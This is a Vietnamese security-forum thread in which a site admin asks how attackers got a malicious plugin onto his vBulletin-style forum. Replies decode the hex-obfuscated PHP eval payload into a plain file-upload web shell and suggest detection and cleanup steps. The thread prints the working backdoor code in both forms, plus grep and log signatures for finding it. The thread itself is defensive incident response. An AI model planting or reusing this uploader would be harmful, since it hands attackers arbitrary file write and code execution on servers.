English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Cách thức hack như thế này và cách khắc phục?  XML
  [Analyzing]   Cách thức hack như thế này và cách khắc phục? 21/11/2012 22:21:27 (+0700) | #1 | 271195
quantri.kdh
Member
[Minus]    0    [Plus]
Joined: 17/12/2011 03:25:29
Messages: 9
Offline
[Profile] [PM]
Hiện tại site em đang có một số kẻ phá hoại, không biết chúng dùng cách gì mà mỗi khi member click vào một box trên diễn đàn nó sẻ tới trang Login, yêu cầu đăng nhập
Còn admin khi click vào sẽ chuyển đến trang Plugin và Add một Plugin mới với Shellcode bên trong có nội dung bên dưới

Mong được ace giúp đỡ, nguyên nhân và cách khắc phục

Cảm ơn!

Code:
eval("\x20\x69\x66\x20\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x27\x64\x6f\x27\x5d\x3d\x3d\x27\x6c\x6f\x61\x64\x27\x29\x7b\xd\xa\x20\x24\x66\x69\x6c\x65\x73\x20\x3d\x20\x40\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x66\x69\x6c\x65\x73\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x20\x21\x3d\x20\x27\x27\x29\x7b\xd\xa\x20\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x20\x3d\x20\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x22\x70\x61\x74\x68\x22\x5d\x2e\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f\x66\x69\x6c\x65\x28\x24\x66\x69\x6c\x65\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27\x5d\x2c\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x29\x29\x20\x65\x63\x68\x6f\x20\x22\x3c\x68\x31\x3e\x3c\x61\x20\x68\x72\x65\x66\x3d\x27\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x27\x3e\x4f\x4b\x2d\x43\x6c\x69\x63\x6b\x20\x68\x65\x72\x65\x21\x3c\x2f\x61\x3e\x3c\x2f\x68\x31\x3e\x22\x3b\xd\xa\x20\x7d\xd\xa\x20\x64\x69\x65\x28\x27\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x50\x4f\x53\x54\x20\x65\x6e\x63\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x22\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x74\x65\x78\x74\x20\x6e\x61\x6d\x65\x3d\x70\x61\x74\x68\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x73\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x73\x75\x62\x6d\x69\x74\x20\x76\x61\x6c\x75\x65\x3d\x22\x55\x70\x22\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\x27\x29\x3b\xd\xa\x20\x7d\xd\xa");
[Up] [Print Copy]
  [Analyzing]   Cách thức hack như thế này và cách khắc phục? 28/11/2012 08:32:14 (+0700) | #2 | 271388
[Avatar]
 chiro8x
Member
[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]
Nội dung đây bạn :
Code:
if ($_REQUEST['do']=='load'){
 $files = @$_FILES["files"];
 if($files["name"] != ''){
 $fullpath = $_REQUEST["path"].$files["name"];
 if(move_uploaded_file($files['tmp_name'],$fullpath)) echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
 }
 die('<form method=POST enctype="multipart/form-data" action="">
 <input type=text name=path>
 <input type="file" name="files"><input type=submit value="Up"></form>');
 }

Nó chỉ là một đoạn mã upload thôi, bạn vào php.ini tạm thời disable hàm "move_uploaded_file".
Tìm các requets trong accesslog chứa "?do=load"
Tìm các file php chứa "eval("\x20\x69\x66\x20\x28\x24".
Chúc bạn sớm khắc phục được smilie.
while(1){}
[Up] [Print Copy]
  [Analyzing]   Cách thức hack như thế này và cách khắc phục? 01/12/2012 07:55:04 (+0700) | #3 | 271482
juno_okyo
Member
[Minus]    0    [Plus]
Joined: 22/05/2011 23:43:26
Messages: 1
Location: J2TeaM
Offline
[Profile] [PM] [WWW] [Yahoo!]
Bạn vào http://your-forum.com/admincp/announcement.php?do=modify
Tìm xem có thấy thông báo nào bị chèn script vào không.
Vào tiếp Plugin Manager xem có Plugin nào có Hook Location là "init_startup" không thì kiểm tra xem nếu có shell code trên thì xoá ngay plugin đó đi.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|